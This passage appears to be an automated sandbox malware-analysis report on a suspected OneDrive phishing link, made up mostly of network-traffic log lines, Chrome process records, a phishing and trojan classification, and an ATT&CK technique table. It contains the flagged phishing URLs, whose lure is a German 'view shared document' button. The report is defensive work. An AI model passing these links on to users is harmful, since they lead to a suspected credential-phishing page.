    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
    Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50249
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
    Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50278 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
    Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
    Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
    Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
    Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50275 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
    Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
    Source: unknownNetwork traffic detected: HTTP traffic on port 50226 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
    Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
    Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50286
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
    Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50293
    Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50283 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49981 version: TLS 1.2
    Source: classification engineClassification label: mal72.phis.troj.win@26/145@97/505
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1928,i,2509791596793076584,592649922223633577,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1928,i,2509791596793076584,592649922223633577,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 4.15.pages.csv, type: HTML

    Persistence and Installation Behavior

    barindex
    Source: https://onedrive.live.com/personal/3e563d3fb2a98d1c/_layouts/15/Doc.aspx?sourcedoc=%7Ba5e46869-611b-4483-bcab-4817eed24b41%7D&action=default&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_ZT1IUGpxVW4&slrid=ba095da1-10b3-a000-2020-f8c86b0ebf8e&originalPath=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_cnRpbWU9QmY3LXdDVDAzRWc&CID=41ae2d81-d6a2-4d5a-bc24-bef3a325b0a4&_SRM=0:G:39LLM: Page contains button: 'FREIGEGBENES DOKUMENT ANZEIGEN' Source: '1.1.pages.csv'
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection
    1
    Extra Window Memory Injection
